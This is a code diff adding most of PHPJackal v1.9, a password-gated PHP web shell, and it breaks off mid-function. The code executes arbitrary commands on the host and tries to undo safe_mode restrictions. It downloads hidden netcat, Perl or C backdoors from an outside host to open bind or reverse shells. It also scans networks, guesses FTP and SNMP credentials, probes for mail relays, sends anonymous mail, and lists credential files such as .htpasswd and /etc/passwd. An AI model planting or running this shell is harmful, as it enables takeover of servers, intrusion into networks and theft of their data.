+if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></form>$et</body></html>");
+}
+if(!empty($_REQUEST['workingdiR']))chdir($_REQUEST['workingdiR']);
+$disablefunctions=ini_get('disable_functions');
+$disablefunctions=explode(',',$disablefunctions);
+function checkthisporT($ip,$port,$timeout,$type=0){
+if(!$type){
+$scan=fsockopen($ip,$port,$n,$s,$timeout);
+if($scan){fclose($scan);return 1;}
+}
+elseif(function_exists('socket_set_timeout')){
+$scan=fsockopen("udp://$ip",$port);
+if($scan){
+socket_set_timeout($scan,$timeout);
+fwrite($scan,"\x00");
+$s=time();
+fread($scan,1);
+if((time()-$s)>=$timeout){fclose($scan);return 1;}
+}
+}
+return 0;
+}
+if(!function_exists('file_get_contents')){
+function file_get_contents($addr){
+$a=fopen($addr,'r');
+$tmp=fread($a,filesize($a));
+fclose($a);
+if($a)return $tmp;else return null;
+}
+}
+if(!function_exists('file_put_contents')){
+function file_put_contents($addr,$con){
+$a=fopen($addr,'w');
+if(!$a)return 0;
+$t=fwrite($a,$con);
+fclose($a);
+if($t)return strlen($con);
+return 0;
+}
+}
+function file_add_contentS($addr,$con){
+$a=fopen($addr,'a');
+if(!$a)return 0;
+fwrite($a,$con);
+fclose($a);
+return strlen($con);
+}
+if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_REQUEST['modE']);
+if(!empty($_REQUEST['downloaD'])){
+ob_clean();
+$dl=$_REQUEST['downloaD'];
+$con=file_get_contents($dl);
+header('Content-type: application/octet-stream');
+header("Content-disposition: attachment; filename=\"$dl\";");
+header('Content-length: '.strlen($con));
+echo $con;
+exit;
+}
+if(!empty($_REQUEST['imagE'])){
+$img=$_REQUEST['imagE'];
+header('Content-type: imagE/gif');
+header("Content-length: ".filesize($img));
+header("Last-Modified: ".date('r',filemtime($img)));
+echo file_get_contents($img);
+exit;
+}
+if(!empty($_REQUEST['exT'])){
+$ex=$_REQUEST['exT'];
+$e=get_extension_funcs($ex);
+echo '<html><head><title>'.htmlspecialchars($ex).'</title></head><body><b>Functions:</b><br>';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f ";if(in_array($f,$disablefunctions))echo '<font color=red>DISABLED</font>';echo '<br>';}
+echo '</body></html>';
+exit;
+}
+header('Cache-Control: no-cache, must-revalidate');
+header('Expires: Mon, 7 Aug 1987 05:00:00 GMT');
+function showsizE($size){
+if($size>=1073741824)$size=round(($size/1073741824),2).' GB';
+elseif($size>=1048576)$size=round(($size/1048576),2).' MB';
+elseif($size>=1024)$size=round(($size/1024),2).' KB';
+else $size.=' B';
+return $size;
+}
+$windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1:0;
+$errorbox="<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td><b>Error: </b>";
+$v='1.9';
+$cwd=getcwd();
+$msgbox="<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td align='center'>";
+$intro="<center><table border=0 style='border-collapse: collapse'><tr><td bgcolor='#666666'><b>Script:</b><br>".str_repeat('-=-',25)."<br><b>Name:</b> PHPJackal<br><b>Version:</b> $v<br><br><b>Author:</b><br>".str_repeat('-=-',25)."<br><b>Name:</b> NetJackal<br><b>Country:</b> Iran<br><b>Website:</b> <a href='http://netjackal.by.ru/' target='_blank'>http://netjackal.by.ru/</a><br><b>Email:</b> <a href='mailto:nima_501@yahoo.com?subject=PHPJackal'>nima_501@yahoo.com</a><br><noscript>".str_repeat('-=-',25)."<br><b>Error: Enable JavaScript in your browser!!!</b></noscript>$et</center>";
+$footer="${msgbox}PHPJackal v$v - Powered By <a href='http://netjackal.by.ru/' target='_blank'>NetJackal</a>$et";
+$hcwd="<input type=hidden name=workingdiR value='$cwd'>";
+$t="<table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#333333'>";
+$crack="</td><td bgcolor='#333333'></td></tr><form method='POST' name=form><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>";
+function checkfunctioN($func){
+global $disablefunctions,$safemode;
+$safe=array('passthru','system','exec','exec','shell_exec','popen','proc_open');
+if($safemode=='ON' && in_array($func,$safe))return 0;
+elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1;
+return 0;
+}
+function whereistmP(){
+$uploadtmp=ini_get('upload_tmp_dir');
+$uf=getenv('USERPROFILE');
+$af=getenv('ALLUSERSPROFILE');
+$se=ini_get('session.save_path');
+$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
+if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
+if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
+if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
+if(is_dir($uf) && is_writable($uf))return $uf;
+if(is_dir($af) && is_writable($af))return $af;
+if(is_dir($se) && is_writable($se))return $se;
+if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
+if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
+return '.';
+}
+function shelL($command){
+global $windows;
+$exec=$output='';
+$dep[]=array('pipe','r');$dep[]=array('pipe','w');
+if(checkfunctioN('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
+elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
+elseif(checkfunctioN('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;}
+elseif(checkfunctioN('shell_exec'))$exec=shell_exec($command);
+elseif(checkfunctioN('popen')){$output=popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
+elseif(checkfunctioN('proc_open')){$res=proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
+elseif(checkfunctioN('win_shell_execute'))$exec=winshelL($command);
+elseif(checkfunctioN('win32_create_service'))$exec=srvshelL($command);
+elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws);
+return $exec;
+}
+function getiT($get){
+$fo=strtolower(ini_get('allow_url_fopen'));
+$ui=strtolower(ini_get('allow_url_include'));
+if($fo || $fo=='on')$con=file_get_contents($get);
+elseif($ui || $ui=='on'){
+ob_start();
+include('http://netjackal.net/');
+$con=ob_get_contents();
+ob_end_clean();
+}
+else{
+$u=parse_url($get);
+$host=$u['host'];$file=(empty($u['path']))?'/':$u['path'];$port=(empty($u['port']))?80:$u['port'];
+$url=fsockopen($host,$port,$en,$es,12);
+fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
+$tmp=$con='';
+while($tmp!="\r\n")$tmp=fgets($url);
+while(!feof($url))$con.=fgets($url);
+}
+return $con;
+}
+function downloadiT($get,$put){
+$con=getiT($get);
+$mk=file_put_contents($put,$con);
+if($mk)return 1;
+return 0;
+}
+function winshelL($command){
+$name=whereistmP()."\\".uniqid('NJ');
+win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
+sleep(1);
+$exec=file_get_contents($name);
+unlink($name);
+return $exec;
+}
+function srvshelL($command){
+$name=whereistmP()."\\".uniqid('NJ');
+$n=uniqid('NJ');
+$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
+win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
+win32_start_service($n);
+win32_stop_service($n);
+win32_delete_service($n);
+sleep(1);
+$exec=file_get_contents($name);
+unlink($name);
+return $exec;
+}
+function comshelL($command,$ws){
+$exec=$ws->exec ("cmd.exe /c $command"); 
+$so=$exec->StdOut();
+return $so->ReadAll();
+}
+function smtpchecK($addr,$user,$pass,$timeout){
+$sock=fsockopen($addr,25,$n,$s,$timeout);
+if(!$sock)return -1;
+fread($sock,1024);
+fputs($sock,'ehlo '.uniqid('NJ')."\r\n");
+$res=substr(fgets($sock,512),0,1);
+if($res!='2')return 0;
+fgets($sock,512);fgets($sock,512);fgets($sock,512);
+fputs($sock,"AUTH LOGIN\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='334')return 0;
+fputs($sock,base64_encode($user)."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='334')return 0;
+fputs($sock,base64_encode($pass)."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='235')return 0;
+return 1;
+}
+function mysqlchecK($host,$user,$pass,$timeout){
+if(function_exists('mysql_connect')){
+$l=mysql_connect($host,$user,$pass);
+if($l)return 1;
+}
+return 0;
+}
+function mssqlchecK($host,$user,$pass,$timeout){
+if(function_exists('mssql_connect')){
+$l=mssql_connect($host,$user,$pass);
+if($l)return 1;
+}
+return 0;
+}
+function checksmtP($host,$timeout){
+$from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj')).'.com';
+$sock=fsockopen($host,25,$n,$s,$timeout);
+if(!$sock)return -1;
+$res=substr(fgets($sock,512),0,3);
+if($res!='220')return 0;
+fputs($sock,'HELO '.uniqid('NJ')."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"MAIL FROM: <$from>\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"RCPT TO: <contact@persianblog.com>\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"DATA\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='354')return 0;
+fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." <$from>\r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+return 1;
+}
+function replace_stR($s,$h){
+$ret=$h;
+foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret);
+return $ret;
+}
+function check_urL($url,$method,$search='200',$timeout=3){
+$u=parse_url($url);
+$method=strtoupper($method);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];
+$data=(!empty($u['query']))?$u['query']:'';
+if(!empty($data))$data="?$data";
+$sock=fsockopen($host,$port,$en,$es,$timeout);
+if($sock){
+fputs($sock,"$method $file$data HTTP/1.0\r\n");
+fputs($sock,"Host: $host\r\n");
+if($method=='GET')fputs($sock,"\r\n");
+elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
+else return 0;
+if($search=='200')if(strstr(fgets($sock),'200')){fclose($sock);return 1;}else{fclose($sock);return 0;}
+while(!feof($sock)){
+$res=fgets($sock);
+if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
+}
+fclose($sock);
+}
+return 0;
+}
+function get_sw_namE($host,$timeout){
+$sock=fsockopen($host,80,$en,$es,$timeout);
+if($sock){
+$page=uniqid('NJ');
+fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
+while(!feof($sock)){
+$con=fgets($sock);
+if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
+}
+fclose($sock);
+return -1;
+}return 0;
+}
+function snmpchecK($ip,$com,$timeout){
+$res=0;
+$n=chr(0x00);
+$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00).chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr(0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x02).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).chr(0x06).chr(0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n;
+$sock=fsockopen("udp://$ip",161);
+if(function_exists('socket_set_timeout'))socket_set_timeout($sock,$timeout);
+fputs($sock,$packet);
+socket_set_timeout($sock,$timeout);
+$res=fgets($sock);
+fclose($sock);
+if($res != '')return 1;else return 0;
+}
+$safemode=(ini_get('safe_mode') || strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF';
+if($safemode=='ON'){ini_restore('safe_mode');ini_restore('open_basedir');}
+function brshelL(){
+global $errorbox,$windows,$et,$hcwd;
+$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;
+$addr='http://netjackal.by.ru/br';
+$error="$errorbox Can not make backdoor file, go to writeable folder.$et";
+$n=uniqid('NJ_');
+if(!$windows)$n=".$n";
+$d=whereistmP();
+$name=$d.DIRECTORY_SEPARATOR.$n;
+$c=($_REQUEST['C'])?1:0;
+if(!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1)){
+$port=(int)$_REQUEST['port'];
+if($windows){
+if($c){
+$name.='.exe';
+$bd=downloadiT("$addr/nc",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");
+}else{
+$name=$name.'.pl';
+$bd=downloadiT("$addr/winbind.p",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("perl $name $port");
+}
+}
+else{
+if($c){
+$bd=downloadiT("$addr/bind.c",$name);
+if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");
+}else{
+$bd=downloadiT("$addr/bind.p",$name);
+if(!$bd)echo $error;else shelL("cd $d;perl $n $port &");
+echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>";
+}
+}
+}
+elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){
+$ip=$_REQUEST['ip'];
+$port=(int)$_REQUEST['rport'];
+if($windows){
+if($c){
+$name.='.exe';
+$bd=downloadiT("$addr/nc",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");
+}else{
+$name=$name.'.pl';
+$bd=downloadiT("$addr/winrc.p",$name);
+shelL("attrib +H $name");
+if (!$bd)echo $error;else shelL("perl.exe $name $ip $port");
+}
+}
+else{
+if($c){
+$bd=downloadiT("$addr/rc.c",$name);
+if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
+}else{
+$bd=downloadiT("$addr/rc.p",$name);
+if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &");
+}
+}
+echo '<font color=blue>Done!</font>';}
+else{echo "<table border=0 style='border-collapse: collapse' width='100%'><tr><td><table border=0 style='border-collapse: collapse' width='50%'><tr><td width='50%' bgcolor='#333333'>Bind shell:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Port:</td><td bgcolor='#666666'><input type=text name=port value=55501 size=5></td></tr><tr><td width='20%' bgcolor='#808080'>Type:</td><td bgcolor='#808080'><input type=radio style='border-width:1px;background-color:#808080;' value=0 checked name=C>PERL<input type=radio style='border-width:1px;background-color:#808080;' name=C value=1>";if($windows)echo 'EXE';else echo 'C';echo"</td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input type=submit class=buttons value=Bind></form>$et</td><td><table border=0 style='border-collapse: collapse' width='50%'><tr><td width='40%' bgcolor='#333333'>Reverse shell:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#808080'>IP:</td><td bgcolor='#808080'><input type=text name=ip value=";echo $_SERVER['REMOTE_ADDR'];echo " size=17></td></tr><tr><td width='20%' bgcolor='#666666'>Port:</td><td bgcolor='#666666'><input type=text name=rport value=53 size=5></td></tr><tr><td width='20%' bgcolor='#808080'>Type:</td><td bgcolor='#808080'><input type=radio style='border-width:1px;background-color:#808080;' value=0 checked name=C>PERL<input type=radio style='border-width:1px;background-color:#808080;' name=C value=1>";if($windows)echo 'EXE';else echo 'C';echo"</td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value=Connect></form>$et$et";}}
+function showimagE($img){
+echo "<center><img border=0 src='".hlinK("imagE=$img&&workingdiR=".getcwd())."'></center>";}
+function editoR($file){
+global $errorbox,$et,$hcwd,$cwd;
+if(is_file($file)){
+if(!is_readable($file)){echo "$errorbox File is not readable$et<br>";}
+if(!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";}
+$data=file_get_contents($file);
+echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='10%' bgcolor='#808080'><form method='POST'>$hcwd<input type=text value='".htmlspecialchars($file)."' size=75 name=file><input type=submit class=buttons name=Open value=Open></form>$et<br><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#666666'><form method='POST'><textarea rows='18' name='edited' cols='64'>";
+echo htmlspecialchars($data);
+echo "</textarea></td></tr><tr><td width='10%' bgcolor='#808080'><input type=text value='$file' size=80 name=file></td></tr><td width='40%' bgcolor='#666666' align='right'>";
+}
+else {echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='10%' bgcolor='#808080'><form method='POST'><input type=text value='$cwd' size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></form>$et<br><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#666666'><form method='POST'><textarea rows='18' name='edited' cols='63'></textarea></td></tr><tr><td width='10%' bgcolor='#808080'><input type=text value='$cwd' size=80 name=file></td></tr><td width='40%' bgcolor='#666666' align='right'>";
+}
+echo "$hcwd<input type=submit class=buttons name=Save value=Save></form>$et</center>";
+}
+function webshelL(){
+global $windows,$hcwd,$et,$cwd;
+if($windows){
+$alias="<option value='netstat -an'>Display open ports</option><option value='tasklist'>List of processes</option><option value='systeminfo'>System information</option><option value='ipconfig /all'>IP configuration</option><option value='getmac'>Get MAC address</option><option value='net start'>Services list</option><option value='net view'>Machines in domain</option><option value='net user'>Users list</option><option value='shutdown -s -f -t 1'>Turn off the server</option>";
+}
+else{
+$alias="<option value='netstat -an | grep -i listen'>Display open ports</option><option value='last -a -n 250 -i'>Show last 250 logged in users</option><option value='which wget curl lynx w3m'>Downloaders</option><option value='find / -perm -2 -type d -print'>Find world-writable directories</option><option value='find . -perm -2 -type d -print'>Find world-writable directories(in current directory)</option><option value='find / -perm -2 -type f -print'>Find world-writable files</option><option value='find . -perm -2 -type f -print'>Find world-writable files(in current directory)</option><option value='find / -type f -perm 04000 -ls'>Find files with SUID bit set</option><option value='find / -type f -perm 02000 -ls'>Find files with SGID bit set</option><option value='find / -name .htpasswd -type f'>Find .htpasswd files</option><option value='find / -type f -name .bash_history'>Find .bash_history files</option><option value='cat /etc/syslog.conf'>View syslog.conf</option><option value='cat cat /etc/hosts'>View hosts</option><option value='ps auxw'>List of processes</option>";
+if(is_dir('/etc/valiases'))$alias.="<option value='ls -l /etc/valiases'>List of cPanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value='ls -l /etc/vdomainaliases'>List cPanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value='cat /var/cpanel/accounting.log'>Display cPanel`s log</option>";
+if(is_dir('/var/spool/mail/'))$alias.="<option value='ls /var/spool/mail/'>Mailboxes list</option>";
+}
+echo "<center><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='65%'><form method='POST'><tr><td width='20%'><b>Location:</b><input type=text name=workingdiR size=82 value='$cwd'><input class=buttons type=submit value=Change></form>$et<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='65%'><tr><td><b>Web Shell:</b></td></tr><td bgcolor='#666666'><textarea rows='23' cols='79'>";
+if(!empty($_REQUEST['cmd']))echo shelL($_REQUEST['cmd']);
+echo"</textarea></td></tr><form method=post><tr><td bgcolor='#808080'><input type=text size=91 name=cmd value='";if(!empty($_REQUEST['cmd']))echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows)echo "cat /etc/passwd";echo "'>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor='#808080'><select name='cmd' width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></form>$et</table><center>";
+}
+function maileR(){
+global $msgbox,$et,$hcwd;
+if(!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){
+$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];
+if(mail($to,$subject,$body,"From: $from"))echo "$msgbox<b>Mail sent!</b><br>$et";
+}
+echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'><td><b>Mailer:</b></td></tr><td width='20%' bgcolor='#666666'>SMTP</td><td bgcolor='#666666'>".ini_get('SMTP').' ('.ini_get('smtp_port').")</td></tr><tr><td bgcolor='#808080'>From:</td><td bgcolor='#808080'><input name=from type=text value='evil@hell.gov' size=55>$hcwd</td><tr><td width='25%' bgcolor='#666666'>To:</td><td bgcolor='#666666'><input name=to type=text value='";if(!empty($_ENV['SERVER_ADMIN']))echo $_ENV['SERVER_ADMIN'];else echo 'admin@'.getenv('HTTP_HOST'); echo "' size=55></td></tr><tr><td bgcolor='#808080'>Subject:</td><td bgcolor='#808080'><input name=subject type=text value='' size=55></td><tr><td bgcolor='#666666'>Body:</td><td bgcolor='#666666'><textarea rows='18' cols='43' name=body></textarea></td></tr><tr><td width='10%' bgcolor='#808080'></td><td bgcolor='#808080' align='right'><input type=submit class=buttons value=Send></form>$et";
+}
+function scanneR(){
+global $hcwd,$et;
+if(!empty($_SERVER['SERVER_ADDR']))$host=$_SERVER['SERVER_ADDR'];else $host='127.0.0.1';
+$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
+if(($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
+$target=$_REQUEST['target'];$from=(int)$_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu=0;
+echo '<font color=blue>Port scanning started against '.htmlspecialchars($target).':<br>';
+$start=time();
+for($i=$from;$i<=$to;$i++){
+if($tcp){
+if(checkthisporT($target,$i,$timeout)){
+$nu++;
+$ser='';
+if(getservbyport($i,'tcp'))$ser='('.getservbyport($i,'tcp').')';
+echo "$nu) $i $ser (<a href='telnet://$target:$i'>Connect</a>) [TCP]<br>";
+}
+}
+if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser='';if(getservbyport($i,'udp'))$ser='('.getservbyport($i,'udp').')';echo "$nu) $i $ser [UDP]<br>";}
+}
+$time=time()-$start;
+echo "Done! ($time seconds)</font>";
+}
+elseif(!empty($_REQUEST['securityscanner'])){
+echo '<font color=blue>';
+$start=time();
+$from=$_REQUEST['from'];
+$to=(int)$_REQUEST['to'];
+$timeout=(int)$_REQUEST['timeout'];
+$f=substr($from,strrpos($from,'.')+1);
+$from=substr($from,0,strrpos($from,'.'));
+if(!empty($_REQUEST['httpscanner'])){
+echo 'Loading webserver bug list...';
+$buglist=whereistmP().DIRECTORY_SEPARATOR.uniqid('BL');
+$dl=downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
+if($dl){$file=file($buglist);echo 'Done! scanning started.<br><br>';}else echo 'Failed!!! scanning started without webserver security testing...<br><br>';
+}else{$fr=htmlspecialchars($from);echo "Scanning $fr.$f-$fr.$to:<br><br>";}
+for($i=$f;$i<=$to;$i++){
+$output=0;
+$ip="$from.$i";
+if(!empty($_REQUEST['nslookup'])){
+$hn=gethostbyaddr($ip);
+if($hn!=$ip)echo "$ip [$hn]<br>"; $output=1;}
+if(!empty($_REQUEST['ipscanner'])){
+$port=$_REQUEST['port'];
+if(strstr($port,','))$p=explode(',',$port);else $p[0]=$port;
+$open=$ser='';
+foreach($p as $po){
+$scan=checkthisporT($ip,$po,$timeout);
+if($scan){
+$ser='';
+if($ser=getservbyport($po,'tcp'))$ser="($ser)";
+$open.=" $po$ser ";
+}
+}
+if($open){echo "$ip) Open ports:$open<br>";$output=1;}
+
+}
+if(!empty($_REQUEST['httpbanner'])){
+$res=get_sw_namE($ip,$timeout);
+if($res){
+echo "$ip) Webserver software: ";
+if($res==-1)echo 'Unknow';
+else echo $res;
+echo '<br>';
+$output=1;
+}
+}
+if(!empty($_REQUEST['httpscanner'])){
+if(checkthisporT($ip,80,$timeout) && !empty($file)){
+$admin=array('/admin/','/adm/');
+$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
+$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
+$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
+foreach($file as $v){
+$vuln=array();
+$v=trim($v);
+if(!$v || $v{0}=='#')continue;
+$v=str_replace('","','^',$v);
+$v=str_replace('"','',$v);
+$vuln=explode('^',$v);
+$page=$cqich=$nukech=$adminch=$userch=$vuln[1];
+if(strstr($page,'@CGIDIRS'))
+foreach($cgi as $cg){
+$cqich=str_replace('@CGIDIRS',$cg,$page);
+$url="http://$ip$cqich";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
+}
+elseif(strstr($page,'@ADMINDIRS'))
+foreach($admin as $cg){
+$adminch=str_replace('@ADMINDIRS',$cg,$page);
+$url="http://$ip$adminch";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
+}
+elseif(strstr($page,'@USERS'))
+foreach($users as $cg){
+$userch=str_replace('@USERS',$cg,$page);
+$url="http://$ip$userch";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
+}
+elseif(strstr($page,'@NUKE'))
+foreach($nuke as $cg){
+$nukech=str_replace('@NUKE',$cg,$page);
+$url="http://$ip$nukech";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
+}
+else{
+$url="http://$ip$page";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
+}
+}
+}
+}
+if(!empty($_REQUEST['smtprelay'])){
+if(checkthisporT($ip,25,$timeout)){
+$res='';
+$res=checksmtP($ip,$timeout);
+if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}
+}
+}
+if(!empty($_REQUEST['snmpscanner'])){
+if(checkthisporT($ip,161,$timeout,1)){
+$com=$_REQUEST['com'];
+$coms=$res='';
+if(strstr($com,','))$c=explode(',',$com);else $c[0]=$com;
+foreach($c as $v){
+$ret=snmpchecK($ip,$v,$timeout);
+if($ret)$coms.=" $v ";
+}
+if($coms!=''){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
+}
+}
+if(!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')){
+if(checkthisporT($ip,21,$timeout)){
+$usps=explode(',',$_REQUEST['userpass']);
+foreach($usps as $v){
+$user=substr($v,0,strpos($v,':'));
+$pass=substr($v,strpos($v,':')+1);
+if($pass=='[BLANK]')$pass='';
+$ftp=ftp_connect($ip,21,$timeout);
+if($ftp){
